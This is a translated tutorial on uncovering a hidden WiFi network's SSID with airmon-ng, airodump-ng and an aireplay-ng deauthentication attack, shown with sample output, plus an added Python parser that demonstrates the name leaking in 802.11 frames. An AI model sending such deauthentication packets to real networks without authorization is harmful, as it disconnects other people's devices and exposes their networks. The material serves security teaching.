🌐 Hidden networks
In this section we will attack WiFi networks that are hidden, that is, not visible to the general public.
Disclaimer: We are going to attack WiFi networks, so these techniques must not be used without the target's consent or approval.
Configure a hidden network
In the WiFi control panel, enable the "Hide SSID" option:

It no longer appears in the list of WiFi networks, and when we connect it shows this message:

Detect a network with a hidden SSID
# 1 - Bring the wlan0 adapter down
ifconfig wlan0 down
# 2 - Start airmon-ng
sudo airmon-ng start wlan0
# 3 - Find the target
sudo airodump-ng wlan0
CH 1 ][ Elapsed: 1 min ][ 2023-11-02 10:22 ][ paused output
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EA:66:AB:4C:31:OA -56 55 0 0 1 720 WPA2 CCMP PSK <length: 0>
|------------|
# The ESSID <length: 0> tells us that the SSID is hidden
# Depending on the type of encryption, it may show the number of characters
View the devices on a hidden network
# 4 - Start airodump-ng with the target BSSID and its CHANNEL
sudo airodump-ng --bssid EA:66:AB:4C:31:OA --channel 1 wlan0
CH 1 ][ Elapsed: 2 mins ][ 2023-11-02 10:38 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EA:66:AB:4C:31:EA -53 48 307 57 0 1 720 WPA2 CCMP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Notes Probes
EA:66:AB:4C:31:OA CE:C1:C0:DB:DF:1F -15 0 -24 0 402
|-----------------|
Attack: Reveal the SSID
We need to deauthenticate a device on the network so that it reveals the SSID when it reconnects:
# We only need to send 1 packet for this attack
sudo aireplay-ng --deauth 1 -a EA:66:AB:4C:31:OA -c CE:C1:C0:DB:DF:1F wlan0
10:44:28 Waiting for beacon frame (BSSID: EA:66:AB:4C:31:EA) on channel 1
10:44:28 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|62 ACKs]
10:44:29 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|63 ACKs]
10:44:29 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 4|59 ACKs]
10:44:30 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [38|59 ACKs]
10:44:31 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [43|60 ACKs]
10:44:31 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [47|62 ACKs]
10:44:32 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [43|60 ACKs]
10:44:32 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [12|85 ACKs]
10:44:33 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 6|63 ACKs]
10:44:33 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|60 ACKs]
10:44:34 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|61 ACKs]
10:44:34 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|63 ACKs]
10:44:35 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|62 ACKs]
CH 1 ][ Elapsed: 10 mins ][ 2023-11-02 10:46 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EA:66:AB:4C:31:EA -49 58 2885 290 0 1 720 WPA2 CCMP PSK INHACKEABLE
BSSID STATION PWR Rate Lost Frames Notes Probes
EA:66:AB:4C:31:OA CE:C1:C0:DB:DF:1F -61 1e- 1 0 3899 EAPOL INHACKEABLE
As we can see, the network's SSID is now shown.
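Why the reconnection exposes the name, as an added example that is not part of the original page: a hidden network blanks the SSID in its beacons, but association requests and probe responses still carry it in clear, so hiding the SSID gives no confidentiality. This Python code parses constructed 802.11 management frames and reports that exposure per BSSID; the MAC addresses and the `build` helper are assumptions made for the example.

```python
# Added example: parses constructed frames, not a capture from the page.
FIXED_LEN = {0: 4, 2: 10, 5: 12, 8: 12}  # assoc-req, reassoc-req, probe-resp, beacon
def parse_ssid(frame: bytes):
    """Return (subtype, bssid, ssid_bytes) for a supported management frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 3 != 0 or (frame[0] >> 4) not in FIXED_LEN:
        return None
    subtype, bssid = frame[0] >> 4, frame[16:22].hex(":")
    pos = 24 + FIXED_LEN[subtype]          # skip 24-byte header and fixed fields
    while pos + 2 <= len(frame):           # walk tag/length/value elements
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2 : pos + 2 + length]
        if len(value) < length:
            return None                    # truncated element
        if tag == 0:                       # element ID 0 carries the SSID
            return subtype, bssid, value
        pos += 2 + length
    return None

def is_hidden(ssid: bytes) -> bool:
    """A hidden SSID is sent as zero-length or as NUL bytes of the real length."""
    return all(b == 0 for b in ssid)

def ssid_exposure(frames):
    """Map each BSSID to whether its beacons hide the SSID and the names seen in clear."""
    report = {}
    for frame in frames:
        parsed = parse_ssid(frame)
        if parsed is None:
            continue
        subtype, bssid, ssid = parsed
        entry = report.setdefault(bssid, {"beacon_hidden": False, "cleartext": set()})
        if not is_hidden(ssid):
            entry["cleartext"].add(ssid.decode("utf-8", "replace"))
        elif subtype == 8:
            entry["beacon_hidden"] = True
    return report

# Constructed sample frames: locally administered MACs; the SSID string is the page's.
AP, STA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
def build(subtype, dst, src, fixed_len, ssid):
    header = bytes([subtype << 4, 0, 0, 0]) + dst + src + AP + b"\x00\x00"
    return header + bytes(fixed_len) + bytes([0, len(ssid)]) + ssid + b"\x01\x01\x82"

SAMPLE = [
    build(8, b"\xff" * 6, AP, 12, b""),        # beacon, zero-length SSID
    build(8, b"\xff" * 6, AP, 12, bytes(11)),  # beacon, NUL-padded SSID
    build(0, AP, STA, 4, b"INHACKEABLE"),      # association request on reconnect
    build(5, STA, AP, 12, b"INHACKEABLE"),     # probe response
]
```

Calling `ssid_exposure(SAMPLE)` returns one entry for the constructed BSSID with `beacon_hidden` set and the name listed under `cleartext`.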